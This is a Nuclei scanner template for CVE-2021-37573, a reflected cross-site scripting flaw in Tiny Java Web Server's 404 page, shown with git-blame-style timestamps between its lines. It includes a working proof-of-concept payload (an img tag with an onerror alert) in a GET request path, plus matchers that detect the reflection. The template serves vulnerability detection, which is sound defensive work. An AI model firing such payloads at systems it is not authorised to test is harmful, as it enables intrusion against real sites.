2021-08-13 22:14:13 +00:00
id : CVE-2021-37573
2021-08-13 22:17:18 +00:00
info :
2022-09-09 17:34:37 +00:00
name : Tiny Java Web Server - Cross-Site Scripting
2021-08-13 22:14:13 +00:00
author : geeknik
severity : medium
2022-05-17 09:18:12 +00:00
description : A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's "404 Page not Found" error page.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
2021-08-14 09:10:52 +00:00
reference :
- https://seclists.org/fulldisclosure/2021/Aug/13
2022-04-01 08:51:42 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-37573
2022-05-17 09:18:12 +00:00
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-042.txt
- http://seclists.org/fulldisclosure/2021/Aug/13
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/cvemon
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-37573
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00303
2024-04-08 11:34:33 +00:00
epss-percentile : 0.69043
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : tiny_java_web_server_project
product : tiny_java_web_server
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,xss,tjws,java,seclists,tiny_java_web_server_project
2021-08-13 22:14:13 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-08-13 22:14:13 +00:00
- method : GET
path :
- "{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"
matchers-condition : and
matchers :
2021-08-13 22:17:35 +00:00
- type : word
2021-08-13 22:14:13 +00:00
part : body
words :
- "<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"
2021-08-14 09:10:52 +00:00
- type : word
part : header
words :
- text/html
2023-07-11 19:49:27 +00:00
- type : status
status :
- 404
2024-03-25 11:57:16 +00:00
# digest: 4b0a00483046022100860677e3cb649f8221c48f8da8c476eaff6ae5218cc6f264058729a4175edb3d022100cde954092485d59c153fd0f1cbf309acc275463b5deb833deb6be569958419ad:922c64590222798bb761d5b6d8e72950